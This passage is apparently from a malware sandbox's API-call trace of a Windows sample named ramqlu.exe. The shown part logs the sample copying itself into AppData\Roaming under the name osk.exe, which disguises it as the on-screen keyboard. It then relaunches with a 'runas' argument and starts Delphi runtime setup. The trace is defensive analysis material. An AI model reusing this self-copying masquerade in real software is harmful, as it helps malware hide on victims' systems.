_MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.622] GetProcessHeap () returned 0x350000 [0057.622] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351298 | out: hHeap=0x350000) returned 1 [0057.622] GetProcessHeap () returned 0x350000 [0057.622] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x18) returned 0x351298 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.623] GetProcessHeap () returned 0x350000 [0057.623] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351298 | out: hHeap=0x350000) returned 1 [0057.623] GetProcessHeap () returned 0x350000 [0057.623] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1c4) returned 0x3632d8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3632d8, Size=0xe8) returned 0x3632d8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3632d8) returned 0xe8 [0057.624] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x3633c8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x363400 [0057.624] _wcsicmp (_String1="ramqlu.exe", _String2=".") returned 68 [0057.624] _wcsicmp (_String1="ramqlu.exe", _String2="..") returned 68 [0057.624] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x20 [0057.624] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x363660 [0057.625] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x3641f0 [0057.625] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0057.625] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0057.625] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e0, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x26f5e0, ReturnLength=0x0) returned 0x0 [0057.625] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e8, ProcessInformationLength=0x4) returned 0x0 [0057.625] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0057.625] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", fInfoLevelId=0x1, lpFindFileData=0x363408, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x363408) returned 0x363698 [0057.625] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x14) returned 0x351298 [0057.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x26e900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0057.627] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="con") returned -53 [0057.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26eaec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0057.627] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0057.627] _get_osfhandle (_FileHandle=3) returned 0x78 [0057.627] GetFileType (hFile=0x78) returned 0x1 [0057.627] SetErrorMode (uMode=0x0) returned 0x0 [0057.627] SetErrorMode (uMode=0x1) returned 0x0 [0057.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", nBufferLength=0x208, lpBuffer=0x26eda0, lpFilePart=0x26eb24 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpFilePart=0x26eb24*="ramqlu.exe") returned 0x30 [0057.627] SetErrorMode (uMode=0x0) returned 0x1 [0057.627] _get_osfhandle (_FileHandle=3) returned 0x78 [0057.627] ReadFile (in: hFile=0x78, lpBuffer=0x150000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26eb90, lpOverlapped=0x0 | out: lpBuffer=0x150000*, lpNumberOfBytesRead=0x26eb90*=0x200, lpOverlapped=0x0) returned 1 [0057.628] SetErrorMode (uMode=0x0) returned 0x0 [0057.628] SetErrorMode (uMode=0x1) returned 0x0 [0057.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x26e700, lpFilePart=0x26e6f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x26e6f8*="osk.exe") returned 0x35 [0057.628] SetErrorMode (uMode=0x0) returned 0x1 [0057.628] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0057.629] GetProcessHeap () returned 0x350000 [0057.629] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x364450 [0057.629] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0057.629] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0057.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0057.629] GetLastError () returned 0x2 [0057.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x26e900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0057.629] SetErrorMode (uMode=0x0) returned 0x0 [0057.629] SetErrorMode (uMode=0x1) returned 0x0 [0057.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x26e700, lpFilePart=0x26e6f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x26e6f8*="osk.exe") returned 0x35 [0057.629] SetErrorMode (uMode=0x0) returned 0x1 [0057.629] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0057.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0057.629] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4abe41b4, dwCopyFlags=0x0) returned 1 [0057.644] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x2020 [0057.645] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", dwFileAttributes=0x2020) returned 1 [0057.645] _close (_FileHandle=3) returned 0 [0057.645] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0057.645] GetFileType (hFile=0xffffffff) returned 0x0 [0057.645] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0057.645] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x26eb34) returned 0 [0057.645] FindNextFileW (in: hFindFile=0x363698, lpFindFileData=0x363408 | out: lpFindFileData=0x363408*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10f3e80, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xd10f3e80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ramqlu.exe", cAlternateFileName="")) returned 0 [0057.645] GetLastError () returned 0x12 [0057.645] FindClose (in: hFindFile=0x363698 | out: hFindFile=0x363698) returned 1 [0057.646] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e0, ProcessInformationLength=0x4) returned 0x0 [0057.646] _vsnwprintf (in: _Buffer=0x4abe5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26f5bc | out: _Buffer=" 1") returned 9 [0057.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.646] GetFileType (hFile=0x7) returned 0x2 [0057.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f548 | out: lpMode=0x26f548) returned 1 [0057.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26f57c | out: lpConsoleScreenBufferInfo=0x26f57c) returned 1 [0057.647] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4abf4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0057.648] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4abf4640, nSize=0x2000, Arguments=0x26f5bc | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0057.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4abf4640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x26f5a0, lpReserved=0x0 | out: lpBuffer=0x4abf4640*, lpNumberOfCharsWritten=0x26f5a0*=0x1b) returned 1 [0057.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abe41ac | out: lpMode=0x4abe41ac) returned 1 [0057.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abe41b0 | out: lpMode=0x4abe41b0) returned 1 [0057.650] SetConsoleInputExeNameW () returned 0x1 [0057.650] GetConsoleOutputCP () returned 0x1b5 [0057.650] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.650] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.650] exit (_Code=0) Process: id = "3" image_name = "ramqlu.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe" page_root = "0x480bb000" os_pid = "0x7c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x4e4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x5d4 [0057.922] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.923] GetKeyboardType (nTypeFlag=0) returned 4 [0057.923] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0057.923] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.923] GetACP () returned 0x4e4 [0057.923] GetCurrentThreadId () returned 0x5d4 [0057.924] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.937] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.937] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.937] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.937] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.938] lstrcpynA (in: lpString1=0x18ecc3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" [0057.938] GetThreadLocale () returned 0x409 [0057.938] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0057.968] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned 48 [0057.968] lstrcpynA (in: lpString1=0x18ecf0, lpString2="ENU", iMaxLength=216 | out: lpString1="ENU") returned="ENU" [0057.968] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.968] lstrcpynA (in: lpString1=0x18ecf0, lpString2="EN", iMaxLength=216 | out: lpString1="EN") returned="EN" [0057.968] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.968] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.968] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c70000 [0057.970] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.970] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.970] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0057.971] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0057.971] GetThreadLocale () returned 0x409 [0057.971] GetSystemMetrics (nIndex=42) returned 0 [0057.977] GetThreadLocale () returned 0x409 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jan") returned 4 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mar") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0057.978] GetLocaleInfoA (in: 